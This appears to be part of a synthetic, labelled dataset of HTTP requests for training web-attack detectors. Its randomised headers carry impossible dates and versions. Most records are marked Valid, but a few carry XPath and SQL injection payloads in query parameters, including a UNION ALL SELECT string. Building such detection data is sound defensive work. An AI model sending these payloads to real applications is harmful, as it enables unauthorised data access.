If-None-Match: "b158mBWCKlB6B6X02W6"
If-Range: Fri, 24 Mar 06 06:49:10 GMT
Max-Forwards: 5
MIME-Version: 5.4
Pragma: hprt3sln=tQtne5de
Proxy-Authorization: Digest nonce
Authorization: Basic dHRkdDk6cGFsMQ==
Range: 63476-77033,-529,5-
Referer: /rdT8i9q/ueoenrt/in4cse/agcr.htm
TE: gzip;q=0.1,deflate;q=0.2,deflate;q=0.9
Trailer: Range
User-Agent: egXnNVI1a http://www.eHecnf.cz
UA-CPU: x86
UA-Disp: 8170,9079,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7545x2141
Via: 0.1 www.olcpe.css, 7.8 www.aciy.jpg, 6.6 122.11.26.162
Transfer-Encoding: nerOea; fibEt2ly=ohmktT
Upgrade: sajgfN/7.8, n2wam/2.4
Warning: 990 183.31.90.109 "igbAcaoD3vs" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 5470041402
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 393
Start - Id: 29764
class: Valid
GET /t9TivP/t6mHcgiwTVEe/y3KGM/rTrsgA7e3elaTel/m4fDipTCkH9ku.png?libreu=icf6&e@dfEpRY8=yusas&yZqk1RC0N=R%25h&bchr=cyse4&cesuRiriaoa=mvaghnr+Aetnes&atst=unf&LYN09=6&errimrStaozkt=%3Fc+&0N@EEkZFp4bs=i8U7j5f&SnhXa2fdhcno=4388&uatdhithaShtI=hDx2IRh&ohhee=51 HTTP/1.1
Host: www.RxstuamieM.com
Connection: rNj1
Accept: audio/*, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: knrbajs-p7mdaten;q=0.0, e6Hio-seDWuq;q=0.4, xAt-efse9aDe;q=0.8, o-ptsaRat
Cache-Control: no-store
Client-ip: 175.124.156.50
Cookie: f05=448;ntbi=Edaneo;sf4re=1888313888;hTslns0=r33I
Cookie2: $Version="723"
Date: Sat, 17 Sep 05 15:51:05 CET
ETag: "VBKG2Z0RIf0MTTl"
Expect: 100-continue
From: apnm@hnhwooJMi.gov
If-Modified-Since: Sat, 05 Jul 08 18:23:49 CET
If-Unmodified-Since: Sat, 28 May 05 14:39:40 UTC
If-Match: "pm5d8eme7@rrY-3Nh-oP"
If-None-Match: *
If-Range: Fri, 16 Jan 09 02:02:18 GMT
Max-Forwards: 78
MIME-Version: 3.4
Pragma: oGoc=sgg7n
Proxy-Authorization: Ugaojh ovcg=gigisa
Authorization: Digest nonce
Range: -02795
Referer: /6ntitrAe/wolarbqr.bin
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 3.3; mt-er; rv:0.4.4) Gecko/43865957
UA-CPU: MIPS
UA-Disp: 045,174,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2347x796
Via: eil/5.7 61.243.26.10, 8.3 www.f8ceoine.gif, HTTP/6.7 www.ca57.jpg
Transfer-Encoding: compress
Upgrade: ireass/1.2, atID/3.9, EkugeU/4.8
Warning: 764 www.9roigr.gif:83 "HTlfn3ttd2atdvow" 
X-Forwarded-For: 150.107.9.100
X-Serial-Number: 55789
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29764
Start - Id: 33633
class: Valid
PUT /A83id.g-Tperl/asna03naqsvbjthoi/tT_xoXD@-Uck5cs.bin? HTTP/1.0
Content-Length: 206
Content-Language: sIwnael,qm
Content-Encoding: gzip
Content-Location: /ws1erUk/qeEnte/gfshoe/unwpsu/mAsdu9v.wav
Content-MD5: dHlZaWVBc3dlYWVubHhlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Aug 09 03:03:24 GMT
Last-Modified: Sun, 30 Nov 08 22:32:55 GMT
Host: 163.177.45.77
Connection: 4tTr
Accept: */*
Accept-Charset: iso-8859-15, iso-8859-8, windows-1254;q=0.9, iso-8859-8-i
Accept-Encoding: *
Accept-Language: aZoeersa-hhgocv, w7sxibdh-pw
Cache-Control: no-cache
Client-ip: 21.116.10.218
Cookie: oi97bope4ioiso=linknetcatoM1ns|D;ieathtder=Elikeh~n  oE;sm9qinerUbIpqa=37054;ty2h=j5 ;VLpGocaRn_Y=145;4sbcIdoeeqiooo=8cdtle3
Cookie2: $Version="803"
Date: Fri, 29 Jul 05 16:08:49 GMT
ETag: "kmSUcPJ2-I1qWCt"
Expect: 100-continue
From: sorto@ieishbt.net
If-Modified-Since: Sat, 16 Jul 05 24:27:00 UTC
If-Unmodified-Since: Fri, 24 Sep 04 19:15:13 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jul 04 08:14:31 CET
Max-Forwards: 1487
MIME-Version: 5.5
Pragma: aodi=n2e3
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM dGRpZUV0ZHNFcmZtZWlpbmduZWQzb25vYmRlY2Ric2pvY2Zwc294ckFjcGllaA==
Range: 689688-61042,8281-8,59457-
Referer: http://n7fymz.ch/DecnHa/albcc/ehetud/esehuia2.shtml
TE: trailers,gzip
Trailer: If-Match
User-Agent: xhdniluuonl8sotsshkw
UA-CPU: PowerPC
UA-Disp: 2341,003,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 298x670
Via: FTP/1.6 www.yine.css
Transfer-Encoding: Trpwae
Upgrade: nlL/9.5
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 0416121042278331
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

osEdFnRe7a4alc=9011&YVmetaoZCI.=s0bnm1a5cbgsound)7h7eh&eut=l o%&-EIX=070964045&5oietpeten7Eian=00733&En63TYhRr7gGTM=kge&hu=asksla&hYAl@Dn=oceerau4od&vp=oAxXQL1m8sZ&ddeqWa=i-.Bo&peudb=52952917&dn=9598072

End - Id: 33633
Start - Id: 30428
class: Valid
GET /igJ/tvVyOk/tktdrsIeaeeiadoe7lnl/rcRulbY9vLLCntrR2/tzDMWPOToz1uoAw8Xe0/o6AVeFXv5-hJu3T7Q.tiff?yreplaceDsfQk=vnull%27mphlebeoh3&nrrTh6mao7=rqyYEi&r1hh9L=nv-CWbS_h8a&votporac=tGK05rGG0SZj&hHoruiSysryO=y HTTP/1.0
Host: 254.237.27.156
Connection: ynbepr
Accept: text/*;q=0.7
Accept-Charset: utf-7;q=0.1, iso-8859-5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 222.100.187.30
Cookie: ri=eoe;et=tohebody;sn1vOw=thttp;ml6pebnye=mFa;svEanaf=mizpXGL84
Cookie2: $Version="2"
Date: Thu, 24 Nov 05 04:14:53 CET
ETag: "qxgtxQ_CE8Y_iDs60"
Expect: 100-continue
From: nicahwnb@ergcencs.st
If-Modified-Since: Mon, 27 Aug 07 23:23:33 GMT
If-Unmodified-Since: Wed, 04 Oct 06 10:41:56 GMT
If-Match: "4il.kxqIWsWGNAd4lJy"
If-None-Match: "NHBfzi9n9.U3@ZYp"
If-Range: Fri, 16 Dec 05 21:34:49 CET
Max-Forwards: 21
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: nytrr hppmt=esdb
Authorization: Basic b2FwOTp0d2Vl
Referer: http://Tadwa.it/infisotn/ieIgd/ijtsrAd/oxu0ttAw/tyeiE.fgf
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 2.7; ng-at; rv:3.9.7) Gecko/51171499
UA-CPU: PowerPC
UA-Disp: 875,388,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x400
Via: HTTP/6.9 www.nhr5dstn.html:44100, hh6y/8.9 221.36.203.172
Transfer-Encoding: identity
Upgrade: ateie/8.9, w2the/1.3, eivOe/3.4
Warning: 485 87.113.145.16 "tapaxhedta" 
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 17997505261977757757
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30428
Start - Id: 17815
class: Valid
GET /rmLbZoZtmyWn1te5gEBI/zetee/tIlbch_3/nMtene41omoeat/mKg09hkNcs4c0@2UmpW/toaresei/-Dv8.K5h/ovJ7J0gPopenoLrs/kmqzWhs4Tot/P0JMD7CgfxFN.jpg?tncpe9aiaF=341&f3vHicaeRt=nA_%40s33xIi&ly64=6409&kpm=optces&msLeIdnsmrO=tRAbMz&@passwdwQ=jaeaccess_log&oash58etDt9=552498 HTTP/1.1
Host: www.uais2.uk:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, identity
Accept-Language: o-e;q=0.1, mp-a0myd, iizf2-ftnio
Cache-Control: only-if-cached
Client-ip: 13.232.29.60
Cookie: div4VT4perlM=irhar6dnrm
Cookie2: $Version="38"
Date: Sat, 18 Aug 07 12:20:54 GMT
ETag: "@fEa6iGXhryeeOqf"
Expect: ugelm
From: khupg@oosaf.ch
If-Modified-Since: Mon, 08 Sep 08 14:52:18 GMT
If-Unmodified-Since: Mon, 26 Sep 05 06:24:04 CET
If-Match: "7b0L5Veb11yNlda9p4"
If-None-Match: "-ZzxcMm9TaVppEx27"
If-Range: Sat, 16 Dec 06 13:26:18 CET
Max-Forwards: 66
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXRlZGxtdGxlYWZ3ZXhsdWhqdGVTODhmdHRnZWF5YWVrZWxkOUxycm50Z3lRb2c=
Range: 76827-723747,02-548
Referer: /1semelbn/aish8/ot5ese.zip
TE: chunked;q=0.7,trailers
Trailer: Pragma
User-Agent: ngDzJv. http://www.tedtlh.fr
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5851x4890
Via: 3.3 www.ddpnso.tiff, HTTP/0.1 218.71.16.12, 6.0 11.108.161.71
Transfer-Encoding: deflate
Upgrade: 0e1dxo/9.3, 9olo/5.1
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 7.104.70.87
X-Serial-Number: 168409741956
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17815
Start - Id: 23053
class: Valid
GET /herse8hara/ez1dhuBweq/r7qgzlzh6/dwsRoem1id1hestfafrS/ssock_streamN49klhR1Vz0dg/oMrivrea9dush/glFByc4KoZm_tkaMu/eH@U_ON0Q8oQPC.msf?encGgi5hZateAw=r0kKNGF&YIobjectJE9MacceptlTmw=104869&tsnoIti=hSit&0DdiclNennwsoe=1759595&i4shilsmhtuo6YO=notAxMukpeuoAt6t&LNSxM-=08&kiwe9ti=ssystemt5%2B%3Dmhn+%3EgdboGa2sa&CCz_cmJ.M=d2++adaDttrvo+hnn%5Co HTTP/1.0
Host: www.kcosnfL.st
Connection: tt8mi5v
Accept: */*;q=0.3
Accept-Charset: iso-10646-ucs-2;q=0.3, windows-1251;q=0.3, iso-8859-4;q=0.1
Accept-Encoding: identity;q=0.8, gzip;q=0.7, deflate;q=0.4, identity
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 214.86.17.4
Cookie: eVusceauimcls=9019
Cookie2: $Version="511"
Date: Tue, 18 Apr 06 09:10:41 UTC
ETag: "7qUh3CQVD7qRGZjvNt"
Expect: 100-continue
From: sAahmw9m@oemr3xo.uk
If-Modified-Since: Thu, 18 Nov 04 06:29:45 UTC
If-Unmodified-Since: Sun, 31 May 09 03:20:26 CET
If-Match: "FcJBb3M@oSuHO@."
If-None-Match: "uw-YdA.YTxd2H_5BbZV"
If-Range: ".mBckE2d93YBEsHRF"
Max-Forwards: 958
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: te3gi lgiorr=rcre
Authorization: NTLM cjFtQm1jRDRlZWJmYjdvc2hydGxpOWV2YVFiZXhzaHRlcnRuN2Y3ZG9jdw==
Range: -41
Referer: http://www.iuGsoah.it/reyh3me/iybn71r/noee/pnHbn/ziots.sh
TE: chunked;q=0.7,chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/1.1 (Windows; U; Win98 6.3; ap-fn; rv:3.0.6) Gecko/00150335
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8167x7630
Via: HTTP/0.9 255.77.181.154
Transfer-Encoding: deflate
Upgrade: ncdhiw/3.5, oaki/2.2
Warning: 007 www.oobensO.tiff "sn6eP" 
X-Forwarded-For: 239.44.113.150
X-Serial-Number: 103102
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23053
Start - Id: 21783
class: Valid
GET /jtudsayopr/Tesa/sirsno/7avile2te6AlahRyH/5adie/oal4ai.jsp?5gyfefq8se=hIi&td=%29slsd6zsnCgaw&vtEgdeoaretort=xsmtuyajuirm&hypssChs=at%5Ci HTTP/1.0
Host: 15.247.157.164:07663
Connection: 5huone
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: cm6-1n1lsiin
Cache-Control: max-age=79
Client-ip: 188.245.41.133
Cookie: se=aoFXV;ebwrajxtr=brrt<:access_loginf 9h;NIbjJxmlAnR-G=06916
Cookie2: $Version="18"
Date: Sat, 19 Jan 08 24:51:28 UTC
ETag: "sKTx.62m4.eRMZt"
Expect: namlElv=leiohmpn;th1aIoRt=aiAtat
From: se39c@pn1i.cz
If-Modified-Since: Sun, 02 Sep 07 06:07:33 CET
If-Unmodified-Since: Tue, 09 Aug 05 19:58:41 GMT
If-Match: "vOQ@UVJp6Xjz--wVVNV."
If-None-Match: *
If-Range: Tue, 01 Dec 09 09:45:52 GMT
Max-Forwards: 0
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: fnbd xgbn=ialtgsd
Range: 8682-
Referer: http://tr9mnt.be/rnttrgyE.mdb
TE: deflate;q=0.9
Trailer: Cache-Control
User-Agent: nrogpeHp9isrmTb
UA-CPU: Sparc
UA-Disp: 8956,517,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9055x3634
Via: HTTP/3.5 www.sLwd.htm:0656, ai5hli/0.0 www.hrylNSt.jpg
Transfer-Encoding: gzip
Upgrade: lmt3e/5.6, eogjeo/0.1
Warning: 112 www.tu1sEln.png "osnbT8nl" 
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 2336379725238
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21783
Start - Id: 3209
class: Valid
GET /et/nanehbeuhiu/j01/D9Mx.pl?aase=seOee&eLnic3lTtn=pfLOtleDuEinvhyga&ttaso=bercutps HTTP/1.1
Host: www.eneEa.it
Connection: close
Accept: text/xml
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: ad1b='okr'
Client-ip: 168.155.88.79
Cookie: lmpeulriuo=3370339;O0honsh=Ycih
Cookie2: $Version="5"
Date: Sun, 30 Aug 09 18:18:48 UTC
ETag: "Sqqoqeb1HRptC3yA"
Expect: 100-continue
From: asano6tc@asob.it
If-Modified-Since: Tue, 10 Jul 07 08:59:44 GMT
If-Unmodified-Since: Thu, 07 Feb 08 18:01:24 CET
If-Match: *
If-None-Match: "CpUPsEBio1d84uK8w3p"
If-Range: *
Max-Forwards: 968
MIME-Version: 0.5
Pragma: uiyet='uceac'
Proxy-Authorization: NTLM amlhbnBCSGc3YWFuQWVlYUhlYW82aHV0dTQyY2ZvcmhFZWVkaA==
Authorization: carne 3aegisw=UnrOeea
Range: -09285
Referer: /ttvc/yeieol/sswteHso.nsf
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.3 (X11; U; Linux i386 7.3; Tn-dg; rv:2.5.4) Gecko/23534362
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3464x9207
Via: FTP/5.3 96.15.187.155:0614, 5.7 www.b6Ubga.tiff, 3.5 www.8atinE5j.js
Transfer-Encoding: compress
Upgrade: ehtr/8.3
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 211.183.197.157
X-Serial-Number: 272265156802487
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 3209
Start - Id: 9895
class: Valid
GET /lJn0e/oIQWnn0tKP/8cDlU8gw6m/rgnAthrCasMktmoedn/y-EUdILKWs7L9/oc5go4U26SFE/hVA0B/flilsiire5tjih/dcqDZr-AL9nEv4g/mohY7ssO7Z.6imcM7/s_t.K/soofinneeoi.html?nrtds=be9twl%5C%3BbU&iWe9eiH71oew=pnni14%29eeoc&erteQ5toccb=rscdred&pma=D&arewd=e77&ezl=rcpnetcat%26idm&Wrrlhirgoaher=d+nph-e&rppaultdrfdnet=46%26c+access_logeki%5Bhokd%3Feh&ngstftel8ji8st=255769&D7inputB=2 HTTP/1.1
Host: www.i0nwneyeai.net
Connection: 6i0b
Accept: */*;q=0.5
Accept-Charset: euc-kr, iso-8859-7, windows-1253
Accept-Encoding: compress, deflate;q=0.2, compress
Accept-Language: ioego-hee, m0ctyabi-owwi
Cache-Control: no-cache
Client-ip: 174.151.119.78
Cookie: y3sMaworn0n=zruxN2yrSMh
Cookie2: $Version="3"
Date: Thu, 18 Aug 05 02:03:11 CET
ETag: "W1YghaQsoItNO1M"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Sat, 20 Jun 09 19:34:07 GMT
If-Unmodified-Since: Tue, 17 Nov 09 10:54:08 CET
If-Match: *
If-None-Match: *
If-Range: "Xb62SExIjlPfuLZq"
Max-Forwards: 78
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM ZXJobjZsd3NMcnN0RWlwcG5pYWRob21lb3NubXh0b28ybnM=
Range: -93110,-40747,-37
Referer: /eaaa2r.pdf
TE: deflate
Trailer: Referer
User-Agent: anVhie/4.8
UA-CPU: StrongARM
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 561x200
Via: ifyrl/9.3 221.185.224.226, 1.7 250.30.178.196:4543
Transfer-Encoding: compress
Upgrade: zauE/7.3, k7tab/8.3, sboo/5.9, 5lei4g/4.2, Aes/7.9
Warning: 400 www.satoatm.gif "qstaeInaenai" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 9554441251585
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9895
Start - Id: 49825
class: XPathInjection
GET /o9CKPW0oFKYOGY.asmx?YleQMQXRBz=z%3Fa3e&tathnbedpey=Cte%27+or+6++%3C+count%28path%2Fchild%3A%3A*%29+++++or++%27zcceg3%27++++%3D++%27&eai=sw+&RAtyl=498703&cclogorlh=2&trliOlqs=q+&nme1ecAIseDy=74&0RcV@tMl=35&cmRen5raeyEieBp=csn+ta&tF7-SxTVGservices9=eal4hoe7qtehde&sose=oDJnf5Ty6SAg HTTP/1.1
Host: 8.132.91.182:2
Connection: close
Accept: text/*;q=0.6, audio/basic
Accept-Charset: windows-1252;q=0.0
Accept-Encoding: 
Accept-Language: rauftsa-e8h82ri7, gweo-oat, 4a-aaf, Ttea-dnl, 0-ho
Cache-Control: max-age=280
Client-ip: 113.253.116.24
Cookie: cpo5e8dceeher=UiatahifsoSMohd;wYTL6WBmochat=6396;2dRobjectN=whteBdps;httpsxUDhtpasso@5=2366;1bodyHNtarG=84073536;ine=eec5wnC24b
Cookie2: $Version="7"
Date: Thu, 03 Jun 04 07:08:09 UTC
ETag: W/"w.9GIbIX8mlsodZh"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 09 Sep 07 06:57:46 CET
If-Unmodified-Since: Fri, 08 Jan 10 12:21:32 CET
If-Match: "ucecuX_RhmYNzx9e07F"
If-None-Match: "oaGOmk42r0VfPgn5P9kZ"
If-Range: "Tk_7pMYt2ZAAxSR"
Max-Forwards: 8888
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZVJhcnJsQTppc3Blbw==
Authorization: NTLM bmlpcHRySW9lOXRlbVBlZWNjbHpld3dydEh0cG9ldHVvc29lbzBlZmV5ZGk=
Range: 146069-77725,-1146
Referer: http://www.civhokeb.com/rieui/Sdxn/owe11/Czef8/httaetei.php
TE: chunked
Trailer: If-Range
User-Agent: a9ee7e
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/3.6 80.202.75.241
Transfer-Encoding: coalqt; lpietfo=dipdwS
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49825
Start - Id: 31812
class: Valid
GET /chss7tmsae5rnoaax/qsTrt/ejAKDkjN/iOe.htm?i4dy3heaiiucle=1139&9yNdzhi66b=asennneEtweRttir3&trc0nsds8oq2=2&ssuleaRnem=7183896&dh=fWKy49-&Rpdxx3OmWs=dHrdeoa&zaweon5ne=ttdiit2tamh&hEnlepelot=aPQc&5tmpaWYHpsU=388852&dHmu=h1bzO&ZpVmailosDdocumentK=ncfe5+k+htaccesnevS2&ultoi5Sutth=cEgQcVykXh9&hwPaltaaime=rtreedaDrR HTTP/1.0
Host: 6.96.39.33
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-15, windows-1258;q=0.5, iso-8859-5;q=0.6, cp-932;q=0.0, x-mac-korean
Accept-Encoding: identity;q=0.1, gzip;q=0.0, gzip, gzip, compress
Accept-Language: ATeawmit-5s6m, xr-e1eIeas, i6MaBEe-toil9nto, etdii-i
Cache-Control: max-stale
Client-ip: 164.206.254.105
Cookie: e6Fea1yRmw=ual;TW-GlEzchildux=sndoqqh\hec;zxsshhspi=vATsehpNnirtItgetcct1
Cookie2: $Version="238"
Date: Sun, 19 Dec 04 09:39:56 CET
ETag: W/"7K-QwkFmT2caBMKsRS"
Expect: 100-continue
From: dtdacndA@tAnldhs.uk
If-Modified-Since: Fri, 16 Mar 07 19:58:37 CET
If-Unmodified-Since: Sat, 22 Jul 06 21:40:35 UTC
If-Match: "j.0-J28BqeGSdCU"
If-None-Match: "3JOSMwoYB3Qs4GXyuLY"
If-Range: "VcCx5N@p3GgDyrU.SVj"
Max-Forwards: 305
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: iyise osjeD=ra8ietol
Authorization: Basic Zm9mYXdwbmU6dHNuNHI=
Range: -4,-862
Referer: /daxs/uzldet/gsoc/0ote/ns8Pncjn.js
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.0 (X11; U; Solaris 9.9; o2-t4; rv:4.7.8) Gecko/39782484
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 540x2072
Via: ltiqih/2.6 www.0gF0d.jpg, 1.5 186.107.59.201
Transfer-Encoding: compress
Upgrade: inb5/7.6, wno1i/2.4, tee6nl/1.1, Ehsnr/8.1, tNmsce/2.1
Warning: 075 www.tgj5brs.htm "nOEloag30nqnokrne7lo" 
X-Forwarded-For: 68.67.211.15
X-Serial-Number: 995299594
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 31812
Start - Id: 30405
class: Valid
GET /tKlteaeotaaektGeotee/hXux1/rtehitTrMzev/inswucuanpoaerehs/8t5E6Q1/essyNamreefoai.shtml? HTTP/1.0
Host: www.syeRtai.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.2
Accept-Language: tht2bmdn-I7ge5l;q=0.9, iTQe-uilq
Cache-Control: no-store
Client-ip: 29.42.254.23
Cookie: nml=50208295;peu=2479740944;dLGGbetween9lincludeHy=767122;eoeNmtuqearva=Yeec;okw=pro\
Cookie2: $Version="355"
Date: Wed, 29 Nov 06 24:51:29 CET
ETag: W/"Yw6YpG4ITJ3ZHO4k"
From: wmReuit@hemuh5.fr
If-Modified-Since: Thu, 25 Dec 08 04:00:40 UTC
If-Unmodified-Since: Sun, 23 Jan 05 16:20:58 GMT
If-Match: *
If-None-Match: "vixJpJj4kB01eZkK"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.9
Pragma: dkfJO='9tReyh'
Authorization: Digest algorithm=lseb
Referer: http://bueed5.be/hdZhcad/9chi/sqivsc/tQshsgo.swf
TE: trailers
User-Agent: a_qtM0 http://www.diirseix.uk
UA-Pixels: 094x400
Via: FTP/3.0 145.158.173.46, HTTP/8.3 www.weeg4odg.html
Transfer-Encoding: gzip
Upgrade: hrn/2.4, mTvSe4/1.5, ua6xno/8.1, tssin/5.7, 7yhoei/2.2
X-Serial-Number: 17997505261977757757
----: -------------------------------------------------

null

End - Id: 30405
Start - Id: 29574
class: Valid
GET /mao9oao.pl?yat7peeueRtp=oah&epenz5dorNhirn=tts%2F&reeh3s1rneTtakn=ha44WVsfuMJA&Mwm=25620&tWlatuyqb=+hsur HTTP/1.0
Host: www.gjunetwifi.uk
Connection: iodege6
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 241.190.126.224
Cookie: uaTaitsqtzq=3srm;uhdnoeEiro4ua=niilley;ileixALa0e=10049
Cookie2: $Version="0"
Date: Fri, 16 May 08 24:10:15 GMT
ETag: "MsiGfy9qc00bkKix8red"
Expect: 100-continue
From: d1em@0njeio.be
If-Modified-Since: Wed, 03 Nov 04 07:38:42 UTC
If-Unmodified-Since: Tue, 20 Feb 07 04:55:44 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Jan 05 02:35:29 GMT
Max-Forwards: 816
MIME-Version: 6.8
Pragma: usoo=e9
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: c1toak Canboa=bESmil
Range: 825369-97,558284-7,646196-4450
Referer: http://www.hnncao.it/rhiotor/VdOu/5sE9Ix.pl
TE: gzip;q=0.9,trailers,deflate;q=0.7
Trailer: Trailer
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 7.0; ot-ah; rv:9.1.7) Gecko/59409251
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: HTTP/6.6 106.33.216.54
Transfer-Encoding: identity
Upgrade: gih7ot/7.0, vjwg/9.7, tttnua/4.6
Warning: 880 250.169.70.244:31 "ob2rr7pb4tes" "Sun, 10 May 09 07:32:46 UTC"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 2765220543108892245
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29574
Start - Id: 42028
class: SqlInjection
GET /lllwoootrn7/KMeVtPy/aZ_FHs8c/ey5TYgOM2Hm81wg4f@.jpg?Gohzinea0=zr39JCYNWZfp&Bpg6=re&vm=%27+++%29+UNION+ALL+SELECT++9363+FROM+++++Caborrjd5+WHERE+++++%28%27%27++%3D%27&fleimMstlann=70086235 HTTP/1.0
Host: www.urs7.de
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: utf-8, shift_jis;q=0.5, iso-2022-jp;q=0.9
Accept-Encoding: 
Accept-Language: edvnkt-ucyehag, 2r8o-oqzu1txn, dpt-O;q=0.9, a-a
Cache-Control: no-cache
Client-ip: 144.52.64.113
Cookie: VESOaBBvfJg=rS.0KXr;RFITvgahYMBZ=~g9tr A
Cookie2: $Version="334"
Date: Thu, 15 May 08 10:34:28 GMT
ETag: W/"lA1u1EyP2heJ6CUKvO"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Wed, 13 Apr 05 03:35:36 GMT
If-Unmodified-Since: Wed, 26 Apr 06 18:25:56 GMT
If-Match: "xcD6@VjuN.@B1bqOeq"
If-None-Match: *
If-Range: "gghkTF6AUe5h4pJ"
Max-Forwards: 75
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest response="8EBC6AbfdcBAA2fEA94dfDD61baEC0de"
Authorization: Basic cnd0ZXRwZjk6c3J2czVzeQ==
Range: 4936-0,-6636
Referer: http://www.lat29nv.st/is0ufCts.txt
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.6 (X11; U; SunOS sun4u 1.8; rc-tr; rv:8.4.4) Gecko/80610302
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 422x9399
Via: HTTP/1.6 211.99.188.186:4962, 9.0 89.96.129.153:48917, FTP/3.8 www.u3lie.shtml
Transfer-Encoding: deflate
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42028
Start - Id: 50049
class: XPathInjection
POST /Iq/ar0ezsuvroB4eieeo0/eWLiHFZh1vBurHTEb/r.DB/tiyahad/tush5e/mdi4Xn30/b.YSYPJhzv.css? HTTP/1.1
Content-Length: 70
Content-Language: a,okler,pwmEeoEd
Content-Encoding: deflate
